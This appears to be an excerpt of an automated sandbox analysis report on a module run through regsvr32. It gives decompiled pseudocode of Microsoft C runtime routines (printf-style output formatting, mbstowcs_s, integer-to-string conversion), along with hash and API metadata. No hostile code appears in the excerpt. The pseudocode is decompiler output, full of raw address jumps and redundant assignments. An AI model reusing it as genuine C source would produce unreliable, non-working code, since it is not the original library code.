                                                      				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                      				_t339 = E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t339;
                                                      				goto 0xf9d3c80e;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t339;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t339;
                                                      				goto 0xf9d3c84b;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t339;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                      				if (_a824 >= 0) goto 0xf9d3c882;
                                                      				_a832 =  ~_a824;
                                                      				asm("bts eax, 0x8");
                                                      				goto 0xf9d3c892;
                                                      				_t342 = _a824;
                                                      				_a832 = _t342;
                                                      				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                      				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                      				_a832 = _a832 & _t342;
                                                      				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                      				_a116 = 1;
                                                      				goto 0xf9d3c8f5;
                                                      				_a80 = _a80 & 0xfffffff7;
                                                      				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                      				_a116 = 0x200;
                                                      				if (_a832 != 0) goto 0xf9d3c908;
                                                      				_a92 = 0;
                                                      				_a64 =  &_a687;
                                                      				_t223 = _a116;
                                                      				_a116 = _a116 - 1;
                                                      				if (_t223 > 0) goto 0xf9d3c936;
                                                      				if (_a832 == 0) goto 0xf9d3c9d3;
                                                      				_a1040 = _a72;
                                                      				_a816 = _t223 / _a1040 + 0x30;
                                                      				_a1048 = _a72;
                                                      				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                      				_t228 = _a816 + _a708;
                                                      				_a816 = _t228;
                                                      				 *_a64 = _a816 & 0x000000ff;
                                                      				_a64 = _a64 - 1;
                                                      				goto 0xf9d3c915;
                                                      				_a104 = _t228;
                                                      				_a64 = _a64 + 1;
                                                      				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                      				if (_a104 == 0) goto 0xf9d3ca12;
                                                      				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                      				_a64 = _a64 - 1;
                                                      				 *_a64 = 0x30;
                                                      				_a104 = _a104 + 1;
                                                      				if (_a108 != 0) goto 0xf9d3cc6e;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                      				_a84 = 0x2d;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                      				_a84 = 0x2b;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                      				_a84 = 0x20;
                                                      				_a92 = 1;
                                                      				_a840 = _a88 - _a104 - _a92;
                                                      				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                      				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                      				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                      				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                      				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                      				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                      				if (_a76 == 0) goto 0xf9d3cc1d;
                                                      				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                      				_a872 = 0;
                                                      				_a848 = _a64;
                                                      				_a856 = _a104;
                                                      				_a856 = _a856 - 1;
                                                      				if (_a856 == 0) goto 0xf9d3cc1b;
                                                      				_a1056 =  *_a848 & 0x0000ffff;
                                                      				r9d = _a1056 & 0x0000ffff;
                                                      				r8d = 6;
                                                      				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                      				_a848 =  &(_a848[1]);
                                                      				if (_a872 != 0) goto 0xf9d3cbe5;
                                                      				if (_a860 != 0) goto 0xf9d3cbf2;
                                                      				_a688 = 0xffffffff;
                                                      				goto 0xf9d3cc1b;
                                                      				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                      				goto 0xf9d3cb60;
                                                      				goto 0xf9d3cc3b;
                                                      				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                      				if (_a688 < 0) goto 0xf9d3cc6e;
                                                      				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                      				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                      				if (_a96 == 0) goto 0xf9d3cc8e;
                                                      				0xf9d25330();
                                                      				_a96 = 0;
                                                      				goto 0xf9d3b99c;
                                                      				if (_a704 == 0) goto 0xf9d3ccb4;
                                                      				if (_a704 == 7) goto 0xf9d3ccb4;
                                                      				_a1060 = 0;
                                                      				goto 0xf9d3ccbf;
                                                      				_a1060 = 1;
                                                      				_t263 = _a1060;
                                                      				_a876 = _t263;
                                                      				if (_a876 != 0) goto 0xf9d3cd05;
                                                      				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                      				_a32 = _t365;
                                                      				r9d = 0;
                                                      				r8d = 0x8f5;
                                                      				0xf9d2b3b0();
                                                      				if (_t263 != 1) goto 0xf9d3cd05;
                                                      				asm("int3");
                                                      				if (_a876 != 0) goto 0xf9d3cd61;
                                                      				0xf9d2ab30();
                                                      				 *_t365 = 0x16;
                                                      				_a32 = 0;
                                                      				r9d = 0x8f5;
                                                      				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      				_a912 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				goto 0xf9d3cd80;
                                                      				_a916 = _a688;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      			}











                                                      0x7fef9d3c9fc
                                                      0x7fef9d3ca03
                                                      0x7fef9d3ca10
                                                      0x7fef9d3ca1a
                                                      0x7fef9d3ca24
                                                      0x7fef9d3ca2d
                                                      0x7fef9d3ca36
                                                      0x7fef9d3ca45
                                                      0x7fef9d3ca52
                                                      0x7fef9d3ca54
                                                      0x7fef9d3ca59
                                                      0x7fef9d3ca61
                                                      0x7fef9d3ca6c
                                                      0x7fef9d3ca6e
                                                      0x7fef9d3ca73
                                                      0x7fef9d3ca7b
                                                      0x7fef9d3ca86
                                                      0x7fef9d3ca88
                                                      0x7fef9d3ca8d
                                                      0x7fef9d3caa5
                                                      0x7fef9d3cab5
                                                      0x7fef9d3cad0
                                                      0x7fef9d3caee
                                                      0x7fef9d3cafc
                                                      0x7fef9d3cb07
                                                      0x7fef9d3cb22
                                                      0x7fef9d3cb2c
                                                      0x7fef9d3cb37
                                                      0x7fef9d3cb3d
                                                      0x7fef9d3cb4d
                                                      0x7fef9d3cb59
                                                      0x7fef9d3cb70
                                                      0x7fef9d3cb79
                                                      0x7fef9d3cb8a
                                                      0x7fef9d3cb92
                                                      0x7fef9d3cb9b
                                                      0x7fef9d3cbb6
                                                      0x7fef9d3cbc9
                                                      0x7fef9d3cbd9
                                                      0x7fef9d3cbe3
                                                      0x7fef9d3cbe5
                                                      0x7fef9d3cbf0
                                                      0x7fef9d3cc11
                                                      0x7fef9d3cc16
                                                      0x7fef9d3cc1b
                                                      0x7fef9d3cc36
                                                      0x7fef9d3cc43
                                                      0x7fef9d3cc4e
                                                      0x7fef9d3cc69
                                                      0x7fef9d3cc74
                                                      0x7fef9d3cc80
                                                      0x7fef9d3cc85
                                                      0x7fef9d3cc8e
                                                      0x7fef9d3cc9b
                                                      0x7fef9d3cca5
                                                      0x7fef9d3cca7
                                                      0x7fef9d3ccb2
                                                      0x7fef9d3ccb4
                                                      0x7fef9d3ccbf
                                                      0x7fef9d3ccc6
                                                      0x7fef9d3ccd5
                                                      0x7fef9d3ccd7
                                                      0x7fef9d3ccde
                                                      0x7fef9d3cce3
                                                      0x7fef9d3cce6
                                                      0x7fef9d3ccf8
                                                      0x7fef9d3cd00
                                                      0x7fef9d3cd02
                                                      0x7fef9d3cd0d
                                                      0x7fef9d3cd0f
                                                      0x7fef9d3cd14
                                                      0x7fef9d3cd1a
                                                      0x7fef9d3cd23
                                                      0x7fef9d3cd3e
                                                      0x7fef9d3cd43
                                                      0x7fef9d3cd53
                                                      0x7fef9d3cd5f
                                                      0x7fef9d3cd68
                                                      0x7fef9d3cd74
                                                      0x7fef9d3cd97

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg$wctomb_s
                                                      • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2984758162-268265396
                                                      • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                      • Instruction ID: a9c1e15515d35d7cf033a694107a1be22a212de4b62ef600bdbf999f0f55ea8a
                                                      • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                      • Instruction Fuzzy Hash: 7202ED7260DBC586E7B1CB25E8857AEB7E4F384795F200125EACD86AA8DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                      • API String ID: 2192614184-660564692
                                                      • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                      • Instruction ID: 92bf99913cb81df5d7f4b76c0ee557dab353d6c18ff2e6375d0d5446e39197ae
                                                      • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                      • Instruction Fuzzy Hash: 8DE10C31A0DBC685E7B09B14E8457AEA3E0F384754FA04626D6DD53AE8DF7ED484CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                                      				long long _v24;
                                                      				long long _v32;
                                                      				long long _v40;
                                                      				long long _v48;
                                                      				long long _v56;
                                                      				void* _v64;
                                                      				long long _v72;
                                                      				void* _t88;
                                                      				void* _t89;
                                                      				void* _t107;
                                                      				void* _t109;
                                                      				signed int* _t158;
                                                      				signed int* _t160;
                                                      				long long _t175;
                                                      				long long _t186;
                                                      				signed int* _t187;
                                                      				signed int* _t193;
                                                      
                                                      				_a32 = __r9;
                                                      				_a24 = __r8;
                                                      				_a16 = __rdx;
                                                      				_a8 = __rcx;
                                                      				_v72 = 0;
                                                      				_t158 = _a24;
                                                      				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
                                                      				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
                                                      				_v56 = _t158 + _a24[1];
                                                      				goto 0xf9d35642;
                                                      				_v56 = 0;
                                                      				if (_v56 == 0) goto 0xf9d356aa;
                                                      				_t160 = _a24;
                                                      				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
                                                      				E000007FE7FEF9D2E680(_t89, _t160);
                                                      				_v48 = _t160 + _a24[1];
                                                      				goto 0xf9d3567c;
                                                      				_v48 = 0;
                                                      				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
                                                      				if (_a24[2] != 0) goto 0xf9d356b1;
                                                      				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
                                                      				goto 0xf9d35966;
                                                      				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
                                                      				_v64 = _a16;
                                                      				goto 0xf9d356e9;
                                                      				_v64 = _a24[2] +  *_a16;
                                                      				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
                                                      				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
                                                      				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
                                                      				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                                      				_t175 = _v64;
                                                      				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
                                                      				 *_v64 = _t175;
                                                      				goto 0xf9d35760;
                                                      				E000007FE7FEF9D2CF80(_t175);
                                                      				goto 0xf9d3595a;
                                                      				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
                                                      				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
                                                      				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
                                                      				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                                      				if (_a32[5] != 8) goto 0xf9d35807;
                                                      				if ( *_v64 == 0) goto 0xf9d35807;
                                                      				_t186 = _v64;
                                                      				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
                                                      				 *_v64 = _t186;
                                                      				goto 0xf9d3580e;
                                                      				_t109 = E000007FE7FEF9D2CF80(_t186);
                                                      				goto 0xf9d3595a;
                                                      				_t187 = _a32;
                                                      				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
                                                      				E000007FE7FEF9D2E6A0(_t109, _t187);
                                                      				_v40 = _t187 + _a32[6];
                                                      				goto 0xf9d35845;
                                                      				_v40 = 0;
                                                      				if (_v40 != 0) goto 0xf9d358c6;
                                                      				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
                                                      				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
                                                      				_t191 = _a32[5];
                                                      				_v32 = _a32[5];
                                                      				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                                      				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
                                                      				goto 0xf9d358c1;
                                                      				E000007FE7FEF9D2CF80(_t191);
                                                      				goto 0xf9d3595a;
                                                      				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
                                                      				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
                                                      				_t193 = _a32;
                                                      				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
                                                      				E000007FE7FEF9D2E6A0(_t117, _t193);
                                                      				_v24 = _t193 + _a32[6];
                                                      				goto 0xf9d35922;
                                                      				_v24 = 0;
                                                      				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
                                                      				_t195 = _a32;
                                                      				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
                                                      				_v72 = 2;
                                                      				goto 0xf9d35953;
                                                      				_v72 = 1;
                                                      				goto 0xf9d3595a;
                                                      				E000007FE7FEF9D2CF80(_a32);
                                                      				E000007FE7FEF9D2CF50(_t195);
                                                      				return _v72;
                                                      			}





















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                      • String ID:
                                                      • API String ID: 801082872-0
                                                      • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                      • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                                      • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                      • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                      • API String ID: 2123368286-1993839260
                                                      • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                      • Instruction ID: 19a34de06f4f25a15c822aae2b95ff87e4dec291f3645630fab9b4d6ba707880
                                                      • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                      • Instruction Fuzzy Hash: 4AE11836A1CB86CAE7A09B18E84476EB3E1F784345F604525E6CD83BB8DB7ED444CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                      • API String ID: 2123368286-1853640030
                                                      • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                      • Instruction ID: 612b8f3a1e511721bf558c20b5ecc37bcc5fe5373454d887446b2b671354ce2d
                                                      • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                      • Instruction Fuzzy Hash: 2EE13A32A1DB86CAE7A09B59E8447AEB7E1F385344F604125E6CD43BB8DB7ED444CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 22%
                                                      			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                      				signed int _t224;
                                                      				signed char _t229;
                                                      				void* _t260;
                                                      				intOrPtr _t268;
                                                      				signed int _t342;
                                                      				signed int _t343;
                                                      				signed long long _t346;
                                                      				intOrPtr* _t365;
                                                      				intOrPtr* _t370;
                                                      				signed long long _t400;
                                                      
                                                      				_t342 = __rax;
                                                      				_a80 = _a80 | 0x00000040;
                                                      				_a72 = 0xa;
                                                      				_a72 = 0xa;
                                                      				_a116 = 0x10;
                                                      				asm("bts eax, 0xf");
                                                      				_a1220 = 7;
                                                      				_a1220 = 0x27;
                                                      				_a72 = 0x10;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                      				_a84 = 0x30;
                                                      				_a86 = _a1220 + 0x51;
                                                      				_a92 = 2;
                                                      				_a72 = 8;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                      				asm("bts eax, 0x9");
                                                      				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                      				E000007FE7FEF9D31EA0( &_a1560);
                                                      				_a1304 = _t342;
                                                      				goto 0xf9d3e844;
                                                      				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                      				E000007FE7FEF9D31EA0( &_a1560);
                                                      				_a1304 = _t342;
                                                      				goto 0xf9d3e844;
                                                      				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                      				_t343 = E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t343;
                                                      				goto 0xf9d3e807;
                                                      				E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t343;
                                                      				goto 0xf9d3e844;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                      				E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t343;
                                                      				goto 0xf9d3e844;
                                                      				E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t343;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                      				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                      				_a1312 =  ~_a1304;
                                                      				asm("bts eax, 0x8");
                                                      				goto 0xf9d3e88b;
                                                      				_t346 = _a1304;
                                                      				_a1312 = _t346;
                                                      				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                      				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                      				_a1312 = _a1312 & _t346;
                                                      				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                      				_a116 = 1;
                                                      				goto 0xf9d3e8ee;
                                                      				_a80 = _a80 & 0xfffffff7;
                                                      				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                      				_a116 = 0x200;
                                                      				if (_a1312 != 0) goto 0xf9d3e901;
                                                      				_a92 = 0;
                                                      				_a64 =  &_a687;
                                                      				_t224 = _a116;
                                                      				_a116 = _a116 - 1;
                                                      				if (_t224 > 0) goto 0xf9d3e92f;
                                                      				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                      				_a1480 = _a72;
                                                      				_a1296 = _t224 / _a1480 + 0x30;
                                                      				_a1488 = _a72;
                                                      				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                      				_t229 = _a1296 + _a1220;
                                                      				_a1296 = _t229;
                                                      				 *_a64 = _a1296 & 0x000000ff;
                                                      				_a64 = _a64 - 1;
                                                      				goto 0xf9d3e90e;
                                                      				_a104 = _t229;
                                                      				_a64 = _a64 + 1;
                                                      				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                      				if (_a104 == 0) goto 0xf9d3ea0b;
                                                      				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                      				_a64 = _a64 - 1;
                                                      				 *_a64 = 0x30;
                                                      				_a104 = _a104 + 1;
                                                      				if (_a108 != 0) goto 0xf9d3ec7c;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                      				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                      				_a84 = 0x2d;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ea9d;
                                                      				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                      				_a84 = 0x2b;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ea9d;
                                                      				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                      				_a84 = 0x20;
                                                      				_a92 = 1;
                                                      				_a1320 = _a88 - _a104 - _a92;
                                                      				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                      				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                      				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                      				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                      				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                      				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                      				if (_a76 != 0) goto 0xf9d3ec29;
                                                      				if (_a104 <= 0) goto 0xf9d3ec29;
                                                      				_t365 = _a64;
                                                      				_a1328 = _t365;
                                                      				_a1336 = _a104;
                                                      				_a1336 = _a1336 - 1;
                                                      				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                      				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                      				_a1496 = _t365;
                                                      				E000007FE7FEF9D26840(_t260,  &_a120);
                                                      				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                                      				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                      				_a1200 = 0xffffffff;
                                                      				goto 0xf9d3ec27;
                                                      				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                      				_a1328 = _a1328 + _a1340;
                                                      				goto 0xf9d3eb61;
                                                      				goto 0xf9d3ec47;
                                                      				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                      				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                      				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                      				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                      				if (_a96 == 0) goto 0xf9d3ec9c;
                                                      				0xf9d25330();
                                                      				_a96 = 0;
                                                      				goto 0xf9d3da75;
                                                      				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                      				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                      				_a1504 = 0;
                                                      				goto 0xf9d3eccd;
